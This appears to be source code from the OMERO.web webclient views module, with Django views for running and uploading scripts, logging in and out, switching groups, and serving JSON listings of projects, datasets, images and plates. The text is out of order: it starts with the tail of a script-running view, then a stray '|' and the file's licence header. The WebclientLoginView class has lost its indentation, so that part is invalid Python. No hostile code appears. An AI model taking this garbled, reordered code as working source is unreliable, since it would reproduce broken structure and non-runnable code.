    # Build the script's input map: convert each POST value to the rtype of
    # the corresponding parameter prototype.
    for key, param in params.inputs.items():
        prototype = param.prototype
        pclass = prototype.__class__
        if key == "File_Annotation" and fileAnnId is not None:
            inputMap[key] = pclass(str(fileAnnId))
            continue
        # handle bool separately, since unchecked checkbox will not be in
        # request.POST
        if pclass == omero.rtypes.RBoolI:
            value = key in request.POST
            inputMap[key] = pclass(value)
            continue
        if pclass.__name__ == "RMapI":
            # Map parameters arrive as <key>_key0/<key>_value0, _key1/_value1...
            keyName = "%s_key0" % key
            valueName = "%s_value0" % key
            row = 0
            paramMap = {}
            while keyName in request.POST:
                # the key and value don't have any data-type defined by
                # scripts - just use string
                k = str(request.POST[keyName])
                v = request.POST[valueName]
                if len(k) > 0 and len(v) > 0:
                    paramMap[str(k)] = v
                row += 1
                keyName = "%s_key%d" % (key, row)
                valueName = "%s_value%d" % (key, row)
            if len(paramMap) > 0:
                inputMap[key] = wrap(paramMap)
            continue
        if key in request.POST:
            if pclass == omero.rtypes.RListI:
                values = request.POST.getlist(key)
                if len(values) == 0:
                    continue
                if len(values) == 1:  # process comma-separated list
                    if len(values[0]) == 0:
                        continue
                    values = values[0].split(",")
                # try to determine 'type' of values in our list
                listClass = omero.rtypes.RStringI
                pval = prototype.val  # list
                # check if a value type has been set (first item of prototype
                # list)
                if len(pval) > 0:
                    listClass = pval[0].__class__
                    if listClass == int(1).__class__:
                        listClass = omero.rtypes.rint
                    if listClass == long(1).__class__:
                        listClass = omero.rtypes.rlong
                # construct our list, using appropriate 'type'
                valueList = []
                for v in values:
                    try:
                        # RStringI() will encode any unicode
                        obj = listClass(v.strip())
                    except Exception:
                        logger.debug("Invalid entry for '%s' : %s" % (key, v))
                        continue
                    if isinstance(obj, omero.model.IObject):
                        valueList.append(omero.rtypes.robject(obj))
                    else:
                        valueList.append(obj)
                inputMap[key] = omero.rtypes.rlist(valueList)
            # Handle other rtypes: String, Long, Int etc.
            else:
                value = request.POST[key]
                if len(value) == 0:
                    continue
                try:
                    inputMap[key] = pclass(value)
                except Exception:
                    logger.debug("Invalid entry for '%s' : %s" % (key, value))
                    continue
    # If we have objects specified via 'IDs' and 'DataType', try to pick
    # correct group
    if "IDs" in inputMap and "Data_Type" in inputMap:
        gid = conn.SERVICE_OPTS.getOmeroGroup()
        conn.SERVICE_OPTS.setOmeroGroup("-1")
        try:
            firstObj = conn.getObject(
                inputMap["Data_Type"].val, unwrap(inputMap["IDs"])[0]
            )
            newGid = firstObj.getDetails().group.id.val
            conn.SERVICE_OPTS.setOmeroGroup(newGid)
        except Exception:
            logger.debug(traceback.format_exc())
            # if inputMap values not as expected or firstObj is None
            conn.SERVICE_OPTS.setOmeroGroup(gid)
    try:
        # Try/except in case inputs are not serializable, e.g. unicode
        logger.debug("Running script %s with " "params %s" % (scriptName, inputMap))
    except Exception:
        pass
    rsp = run_script(request, conn, sId, inputMap, scriptName)
    return JsonResponse(rsp)
@login_required(isAdmin=True)
@render_response()
def script_upload(request, conn=None, **kwargs):
    """Script upload UI: GET renders the form, POST uploads/replaces a script."""
    if request.method != "POST":
        # Anything other than a POST just renders the upload form
        return {"template": "webclient/scripts/upload_script.html"}
    # Read script path, uploaded file and its text content
    script_path = request.POST.get("script_path")
    uploaded = request.FILES["script_file"]
    uploaded.seek(0)
    text = uploaded.read().decode("utf-8")
    if not script_path.endswith("/"):
        script_path += "/"
    script_path += uploaded.name
    # If the script already exists, replace it; otherwise upload a new one
    svc = conn.getScriptService()
    script_id = svc.getScriptID(script_path)
    try:
        if script_id > 0:
            svc.editScript(OriginalFileI(script_id, False), text)
            message = "Script Replaced: %s" % uploaded.name
        else:
            script_id = svc.uploadOfficialScript(script_path, text)
            message = "Script Uploaded: %s" % uploaded.name
    except omero.ValidationException as ex:
        message = str(ex)
    return {"Message": message, "script_id": script_id}
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
    """
    Uses the scripting service (Batch Image Export script) to generate
    OME-TIFF for an image and attach this as a file annotation to the image.
    Script will show up in the 'Activities' for users to monitor and download
    result etc.
    """
    svc = conn.getScriptService()
    script_id = svc.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
    image = conn.getObject("Image", imageId)
    if image is not None:
        # Run the script in the image's own group context
        conn.SERVICE_OPTS.setOmeroGroup(image.getDetails().group.id.val)
    inputMap = {
        "Data_Type": wrap("Image"),
        "IDs": rlist([rlong(long(imageId))]),
        "Format": wrap("OME-TIFF"),
    }
    rsp = run_script(request, conn, script_id, inputMap, scriptName="Create OME-TIFF")
    return JsonResponse(rsp)
def run_script(request, conn, sId, inputMap, scriptName="Script"):
    """
    Starts running a script, adding details to the request.session so that it
    shows up in the webclient Activities panel and results are available there
    etc.

    @param sId:         Script ID
    @param inputMap:    Map of input name -> wrapped rtype value
    @param scriptName:  Display name used in the Activities panel
    @return:            dict {'jobId', 'status'} on success,
                        {'status', 'error'} on failure
    """
    request.session.modified = True
    scriptService = conn.getScriptService()
    try:
        handle = scriptService.runScript(sId, inputMap, None, conn.SERVICE_OPTS)
        # E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp -h 10.37.129.2 -p 53154:tcp -h 10.211.55.2 -p 53154:tcp -h 10.12.1.230 -p 53154 # noqa
        jobId = str(handle)
        status = "in progress"
        request.session["callback"][jobId] = {
            "job_type": "script",
            "job_name": scriptName,
            "start_time": datetime.datetime.now(),
            "status": status,
        }
        request.session.modified = True
    except Exception as x:
        jobId = str(time())  # E.g. 1312803670.6076391
        # handle python 2 or 3 errors: Py3 exceptions have no .message
        message = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
        if message and message.startswith("No processor available"):
            # omero.ResourceError
            logger.info(traceback.format_exc())
            error = "No Processor Available"
            status = "no processor available"
            message = ""  # template displays message and link
        else:
            # Don't log user mistake as ERROR
            if isinstance(x, omero.ValidationException):
                # Use the portable 'message' computed above: the previous
                # x.message access raised AttributeError on Python 3.
                logger.debug(message)
            else:
                logger.error(traceback.format_exc())
            error = traceback.format_exc()
            status = "failed"
        # save the error to http session, for display in 'Activities' window
        request.session["callback"][jobId] = {
            "job_type": "script",
            "job_name": scriptName,
            "start_time": datetime.datetime.now(),
            "status": status,
            "Message": message,
            "error": error,
        }
        return {"status": status, "error": error}
    return {"jobId": jobId, "status": status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
    """
    Query to see if we have an OME-TIFF attached to the image (assume only 1,
    since Batch Image Export will delete old ones)
    """
    # Any existing OME-TIFF will appear in list
    links = list(
        conn.getAnnotationLinks(
            "Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF
        )
    )
    if not links:
        return {}  # will get returned as json by default
    # use highest ID === most recent
    newest = max(links, key=lambda x: x.getId())
    created = newest.creationEventDate()
    annId = newest.getChild().getId()
    from omeroweb.webgateway.templatetags.common_filters import ago
    return {
        "created": str(created),
        "ago": ago(created),
        "id": annId,
        "download": reverse("download_annotation", args=[annId]),
    }
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2020 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything."""
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.html import escape
from django.utils.http import is_safe_url
from time import time
from omeroweb.version import omeroweb_buildyear as build_year
from omeroweb.version import omeroweb_version as omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import urlencode
from django.core.urlresolvers import reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from django.shortcuts import render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import get_longs as webgateway_get_longs
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import tree
# Python 2/3 compatibility: there is no stdlib ``long`` module, so the
# import fails and ``long`` becomes an alias for ``int`` (Python 3 has no
# builtin ``long``).
try:
    import long
except ImportError:
    long = int
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())
# We want to allow a higher default limit for annotations so we can load
# all the annotations expected for a PAGE of images
ANNOTATIONS_LIMIT = settings.PAGE * 100
def get_long_or_default(request, name, default):
    """
    Return the GET parameter ``name`` coerced to a long, or ``default``
    when the parameter is absent.

    No exceptions are caught here: invalid values should fail loudly, as
    basic type validation is part of the caller's contract.
    """
    raw = request.GET.get(name, default)
    return long(raw) if raw is not None else None
def get_list(request, name):
    """Return the GET list parameter ``name`` with empty strings removed."""
    return [item for item in request.GET.getlist(name) if item != ""]
def get_longs(request, name):
    """Deprecated shim that delegates to omeroweb.webgateway.util.get_longs()."""
    msg = "Deprecated. Use omeroweb.webgateway.util.get_longs()"
    warnings.warn(msg, DeprecationWarning)
    return webgateway_get_longs(request, name)
def get_bool_or_default(request, name, default):
    """
    Return the GET parameter ``name`` converted to a boolean (via toBoolean),
    or the converted ``default`` when the parameter is absent.

    No exceptions are caught here: invalid values should fail loudly, as
    basic type validation is part of the caller's contract.
    """
    raw = request.GET.get(name, default)
    return toBoolean(raw)
def validate_redirect_url(url):
    """
    Return a URL that is safe to redirect to (open-redirect guard).

    If ``url`` points at a host not listed in
    settings.REDIRECT_ALLOWED_HOSTS, the webclient index URL is returned
    instead.
    """
    if is_safe_url(url, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
        return url
    return reverse("webindex")
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
    """Render the index page, preferring a configured INDEX_TEMPLATE if it loads."""
    context = {"version": omero_version, "build_year": build_year}
    if settings.INDEX_TEMPLATE is None:
        context["template"] = "webclient/index.html"
        return context
    try:
        # Verify the configured template actually loads before using it
        template_loader.get_template(settings.INDEX_TEMPLATE)
        context["template"] = settings.INDEX_TEMPLATE
    except Exception:
        # Fall back to the default template and surface the load error
        context["template"] = "webclient/index.html"
        context["error"] = traceback.format_exception(*sys.exc_info())[-1]
    return context
##############################################################################
# views
class WebclientLoginView(LoginView):
"""
Webclient Login - Customises the superclass LoginView
for webclient. Also can be used by other Apps to log in to OMERO. Uses
the 'server' id from request to lookup the server-id (index), host and
port from settings. E.g. "localhost", 4064. Stores these details, along
with username, password etc in the request.session. Resets other data
parameters in the request.session. Tries to get connection to OMERO and
if this works, then we are redirected to the 'index' page or url
specified in REQUEST. If we can't connect, the login page is returned
with appropriate error messages.
"""
template = "webclient/login.html"
useragent = "OMERO.web"
def get(self, request):
"""
GET simply returns the login page
"""
return self.handle_not_logged_in(request)
def handle_logged_in(self, request, conn, connector):
"""
We override this to provide webclient-specific functionality
such as cleaning up any previous sessions (if user didn't logout)
and redirect to specified url or webclient index page.
"""
# webclient has various state that needs cleaning up...
# if 'active_group' remains in session from previous
# login, check it's valid for this user
# NB: we do this for public users in @login_required.get_connection()
if request.session.get("active_group"):
if (
request.session.get("active_group")
not in conn.getEventContext().memberOfGroups
):
del request.session["active_group"]
if request.session.get("user_id"):
# always want to revert to logged-in user
del request.session["user_id"]
if request.session.get("server_settings"):
# always clean when logging in
del request.session["server_settings"]
# do we ned to display server version ?
# server_version = conn.getServerVersion()
if request.POST.get("noredirect"):
return HttpResponse("OK")
url = request.GET.get("url")
if url is None or len(url) == 0:
try:
url = parse_url(settings.LOGIN_REDIRECT)
except Exception:
url = reverse("webindex")
else:
url = validate_redirect_url(url)
return HttpResponseRedirect(url)
def handle_not_logged_in(self, request, error=None, form=None):
"""
Returns a response for failed login.
Reason for failure may be due to server 'error' or because
of form validation errors.
@param request: http request
@param error: Error message
@param form: Instance of Login Form, populated with data
"""
if form is None:
server_id = request.GET.get("server", request.POST.get("server"))
if server_id is not None:
initial = {"server": unicode(server_id)}
form = LoginForm(initial=initial)
else:
form = LoginForm()
context = {
"version": omero_version,
"build_year": build_year,
"error": error,
"form": form,
}
url = request.GET.get("url")
if url is not None and len(url) != 0:
context["url"] = urlencode({"url": url})
if hasattr(settings, "LOGIN_LOGO"):
context["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
redirect = reverse("webindex")
if settings.PUBLIC_URL_FILTER.search(redirect):
context["public_enabled"] = True
context["public_login_redirect"] = redirect
context["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
ver = re.match(
(
r"(?P<major>\d+)\."
r"(?P<minor>\d+)\."
r"(?P<patch>\d+\.?)?"
r"(?P<dev>(dev|a|b|rc)\d+)?.*"
),
omero_version,
)
client_download_tag_re = "^v%s\\.%s\\.[^-]+$" % (
ver.group("major"),
ver.group("minor"),
)
context["client_download_tag_re"] = client_download_tag_re
context["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(request, self.template, context)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
    """Keep the OMERO session alive by pinging the server."""
    # The @login_required decorator does all the work (ping, timeout etc.),
    # so there is nothing left to do here.
    return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
    """
    Update request.session['active_group'] (used by the @login_required
    decorator to configure conn for group-based queries), then redirect
    to 'url'.
    """
    switch_active_group(request)
    # avoid recursive calls back into this view
    if url is None or url.startswith(reverse("change_active_group")):
        url = reverse("webindex")
    return HttpResponseRedirect(validate_redirect_url(url))
def switch_active_group(request, active_group=None):
    """
    Store ``active_group`` in request.session['active_group'], which the
    @login_required decorator uses to configure conn for group-based
    queries.  Falls back to the 'active_group' GET parameter; a no-op when
    neither is supplied or the value is unchanged.
    """
    if active_group is None:
        active_group = get_long_or_default(request, "active_group", None)
        if active_group is None:
            return
    active_group = int(active_group)
    # Only touch the session when the value actually changes
    if request.session.get("active_group") != active_group:
        request.session.modified = True
        request.session["active_group"] = active_group
def fake_experimenter(request, default_name="All members"):
    """
    Marshal a faked experimenter for id -1 ("all members").
    The display name comes from the server setting
    omero.client.ui.menu.dropdown.everyone.label, falling back to
    ``default_name``.
    """
    node = request.session.get("server_settings")
    for key in ("ui", "menu", "dropdown", "everyone"):
        node = node.get(key, {})
    label = node.get("label", default_name)
    return {
        "id": -1,
        "omeName": label,
        "firstName": label,
        "lastName": "",
    }
@login_required(login_redirect="webindex")
def logout(request, conn=None, **kwargs):
    """
    Logout of the session and redirects to the homepage (will redirect to
    login first)
    """
    if request.method != "POST":
        # Non-POST requests get a confirmation form instead
        context = {"url": reverse("weblogout"), "submit": "Do you want to log out?"}
        template = "webgateway/base/includes/post_form.html"
        return render(request, template, context)
    try:
        try:
            conn.close()
        except Exception:
            logger.error("Exception during logout.", exc_info=True)
    finally:
        # Always drop the Django session, even if closing the OMERO
        # connection failed
        request.session.flush()
    return HttpResponseRedirect(reverse(settings.LOGIN_VIEW))
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
    """
    This view handles most of the top-level pages, as specified by 'menu' E.g.
    userdata, usertags, history, search etc.
    Query string 'path' that specifies an object to display in the data tree
    is parsed.
    We also prepare the list of users in the current group, for the
    switch-user form. Change-group form is also prepared.

    @param menu:    Page name, used to pick the template and tree behaviour
    @return:        Template context dict (rendered by @render_response)
    """
    request.session.modified = True
    template = kwargs.get("template", None)
    if template is None:
        if menu == "userdata":
            template = "webclient/data/containers.html"
        elif menu == "usertags":
            template = "webclient/data/containers.html"
        else:
            # E.g. search/search.html
            template = "webclient/%s/%s.html" % (menu, menu)
    # tree support
    show = kwargs.get("show", Show(conn, request, menu))
    # Constructor does no loading. Show.first_selected must be called first
    # in order to set up our initial state correctly.
    try:
        first_sel = show.first_selected
    except IncorrectMenuError as e:
        return HttpResponseRedirect(e.uri)
    # We get the owner of the top level object, E.g. Project
    # Actual api_paths_to_object() is retrieved by jsTree once loaded
    initially_open_owner = show.initially_open_owner
    # If we failed to find 'show'...
    if request.GET.get("show", None) is not None and first_sel is None:
        # and we're logged in as PUBLIC user...
        if (
            settings.PUBLIC_ENABLED
            and settings.PUBLIC_USER == conn.getUser().getOmeName()
        ):
            # this is likely a regular user who needs to log in as themselves.
            # Login then redirect to current url
            return HttpResponseRedirect("%s?url=%s" % (reverse("weblogin"), url))
    # need to be sure that tree will be correct omero.group
    if first_sel is not None:
        group_id = first_sel.details.group.id.val
        if conn.isValidGroup(group_id):
            switch_active_group(request, group_id)
        else:
            first_sel = None
    # search support
    init = {}
    global_search_form = GlobalSearchForm(data=request.GET.copy())
    if menu == "search":
        if global_search_form.is_valid():
            init["query"] = global_search_form.cleaned_data["search_query"]
    # get url without request string - used to refresh page after switch
    # user/group etc
    url = kwargs.get("load_template_url", None)
    if url is None:
        url = reverse(viewname="load_template", args=[menu])
    # validate experimenter is in the active group
    active_group = request.session.get("active_group") or conn.getEventContext().groupId
    # prepare members of group...
    leaders, members = conn.getObject("ExperimenterGroup", active_group).groupSummary()
    userIds = [u.id for u in leaders]
    userIds.extend([u.id for u in members])
    # check any change in experimenter...
    # NB: user_id of -1 means 'All Members' (see fake_experimenter)
    user_id = request.GET.get("experimenter")
    if initially_open_owner is not None:
        if request.session.get("user_id", None) != -1:
            # if we're not already showing 'All Members'...
            user_id = initially_open_owner
    try:
        user_id = long(user_id)
    except Exception:
        user_id = None
    # check if user_id is in a currnt group
    if user_id is not None:
        if (
            user_id
            not in (
                set(map(lambda x: x.id, leaders)) | set(map(lambda x: x.id, members))
            )
            and user_id != -1
        ):
            # All users in group is allowed
            user_id = None
    if user_id is None:
        # ... or check that current user is valid in active group
        user_id = request.session.get("user_id", None)
        if user_id is None or int(user_id) not in userIds:
            if user_id != -1:  # All users in group is allowed
                user_id = conn.getEventContext().userId
    request.session["user_id"] = user_id
    myGroups = list(conn.getGroupsMemberOf())
    myGroups.sort(key=lambda x: x.getName().lower())
    groups = myGroups
    new_container_form = ContainerForm()
    # colleagues required for search.html page only.
    myColleagues = {}
    if menu == "search":
        for g in groups:
            g.loadLeadersAndMembers()
            for c in g.leaders + g.colleagues:
                myColleagues[c.id] = c
        myColleagues = list(myColleagues.values())
        myColleagues.sort(key=lambda x: x.getLastName().lower())
    context = {
        "menu": menu,
        "init": init,
        "myGroups": myGroups,
        "new_container_form": new_container_form,
        "global_search_form": global_search_form,
    }
    context["groups"] = groups
    context["myColleagues"] = myColleagues
    context["active_group"] = conn.getObject("ExperimenterGroup", long(active_group))
    context["active_user"] = conn.getObject("Experimenter", long(user_id))
    context["initially_select"] = show.initially_select
    context["initially_open"] = show.initially_open
    context["isLeader"] = conn.isLeader()
    context["current_url"] = url
    context["page_size"] = settings.PAGE
    context["template"] = template
    context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    context["current_admin_privileges"] = conn.getCurrentAdminPrivileges()
    context["leader_of_groups"] = conn.getEventContext().leaderOfGroups
    context["member_of_groups"] = conn.getEventContext().memberOfGroups
    context["search_default_user"] = settings.SEARCH_DEFAULT_USER
    context["search_default_group"] = settings.SEARCH_DEFAULT_GROUP
    return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
    """Thin view wrapper: delegate straight to the shared template loader."""
    return _load_template(
        request=request, conn=conn, menu=menu, url=url, **kwargs
    )
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
    """
    Loads html content of the Groups/Users drop-down menu on main webclient
    pages.
    Url should be supplied in request, as target for redirect after switching
    group.
    """
    my_groups = list(conn.getGroupsMemberOf())
    my_groups.sort(key=lambda g: g.getName().lower())
    if conn.isAdmin():
        # Admins see every group except the system 'user'/'guest' groups
        roles = conn.getAdminService().getSecurityRoles()
        excluded_ids = [roles.userGroupId, roles.guestGroupId]
        all_groups = conn.getObjects(
            "ExperimenterGroup", opts={"load_experimenters": True}
        )
        visible_groups = [g for g in all_groups if g.getId() not in excluded_ids]
        visible_groups.sort(key=lambda g: g.getName().lower())
    else:
        visible_groups = my_groups
    for grp in visible_groups:
        grp.loadLeadersAndMembers()  # load leaders / members
    return {
        "template": "webclient/base/includes/group_user_content.html",
        "current_url": url,
        "groups": visible_groups,
        "myGroups": my_groups,
    }
@login_required()
def api_group_list(request, conn=None, **kwargs):
    """Return a JSON page of groups, optionally filtered by member."""
    # Read paging / filter parameters from the query string
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        member_id = get_long_or_default(request, "member", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        marshalled = tree.marshal_groups(
            conn=conn, member_id=member_id, page=page, limit=limit
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"groups": marshalled})
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
    """Return JSON details for one experimenter (a negative id means the
    virtual 'all members' experimenter)."""
    try:
        exp_id = long(experimenter_id)
    except ValueError:
        return HttpResponseBadRequest("Invalid experimenter id")
    try:
        if exp_id < 0:
            exp = fake_experimenter(request)
        else:
            exp = tree.marshal_experimenter(conn=conn, experimenter_id=exp_id)
        if exp is None:
            raise Http404("No Experimenter found with ID %s" % exp_id)
        return JsonResponse({"experimenter": exp})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
    """Return top-level containers as JSON: projects, orphaned datasets,
    screens, orphaned plates, and (optionally) the orphaned-images folder.
    """
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        experimenter_id = get_long_or_default(request, "id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # While this interface does support paging, it does so in a
    # very odd way: the limit is enforced per query, so projects,
    # orphaned datasets, screens and orphaned plates each get their own
    # page of results. Fine for page one; later pages may surprise.
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    # Arguments shared by every marshal call below
    common = {
        "conn": conn,
        "group_id": group_id,
        "experimenter_id": experimenter_id,
        "page": page,
        "limit": limit,
    }
    payload = dict()
    try:
        payload["projects"] = tree.marshal_projects(**common)
        # Orphaned datasets (without project parents)
        payload["datasets"] = tree.marshal_datasets(orphaned=True, **common)
        payload["screens"] = tree.marshal_screens(**common)
        # Orphaned plates (without screen parents)
        payload["plates"] = tree.marshal_plates(orphaned=True, **common)
        # The orphaned-images folder: visibility controlled by UI settings
        try:
            orph_t = request.session["server_settings"]["ui"]["tree"]["orphans"]
        except Exception:
            orph_t = {"enabled": True}
        may_see_orphans = (
            conn.isAdmin()
            or conn.isLeader(gid=request.session.get("active_group"))
            or experimenter_id == conn.getUserId()
            or orph_t.get("enabled", True)
        )
        if may_see_orphans:
            orphaned = tree.marshal_orphaned(**common)
            orphaned["name"] = orph_t.get("name", "Orphaned Images")
            payload["orphaned"] = orphaned
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(payload)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
    """Return a JSON page of datasets, optionally within one project."""
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        project_id = get_long_or_default(request, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    try:
        marshalled = tree.marshal_datasets(
            conn=conn, project_id=project_id, group_id=group_id, page=page, limit=limit
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"datasets": marshalled})
@login_required()
def api_image_list(request, conn=None, **kwargs):
    """Get a list of images.

    Specifying dataset_id returns only the images in that dataset.
    Specifying experimenter_id returns that user's orphaned images:
    images belonging to the user that are in none of the user's datasets.
    If both are specified, experimenter_id is currently ignored.
    """
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        dataset_id = get_long_or_default(request, "id", None)
        orphaned = get_bool_or_default(request, "orphaned", False)
        load_pixels = get_bool_or_default(request, "sizeXYZ", False)
        thumb_version = get_bool_or_default(request, "thumbVersion", False)
        date = get_bool_or_default(request, "date", False)
        experimenter_id = get_long_or_default(request, "experimenter_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    # Share ID is in kwargs from api/share_images/<id>/ which will create
    # a share connection in @login_required.
    # We don't support ?share_id in query string since this would allow a
    # share connection to be created for ALL urls, instead of just this one.
    share_id = "share_id" in kwargs and long(kwargs["share_id"]) or None
    try:
        marshalled = tree.marshal_images(
            conn=conn,
            orphaned=orphaned,
            experimenter_id=experimenter_id,
            dataset_id=dataset_id,
            share_id=share_id,
            load_pixels=load_pixels,
            group_id=group_id,
            page=page,
            date=date,
            thumb_version=thumb_version,
            limit=limit,
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"images": marshalled})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
    """Return a JSON page of plates, optionally within one screen."""
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        screen_id = get_long_or_default(request, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    try:
        marshalled = tree.marshal_plates(
            conn=conn, screen_id=screen_id, group_id=group_id, page=page, limit=limit
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"plates": marshalled})
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
    """Return a JSON page of PlateAcquisitions ('runs') for one plate."""
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        plate_id = get_long_or_default(request, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # Orphaned PlateAcquisitions are not possible so querying without a
    # plate is an error
    if plate_id is None:
        return HttpResponseBadRequest("id (plate) must be specified")
    try:
        acquisitions = tree.marshal_plate_acquisitions(
            conn=conn, plate_id=plate_id, page=page, limit=limit
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"acquisitions": acquisitions})
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
    """This is just used internally by api_link DELETE below"""
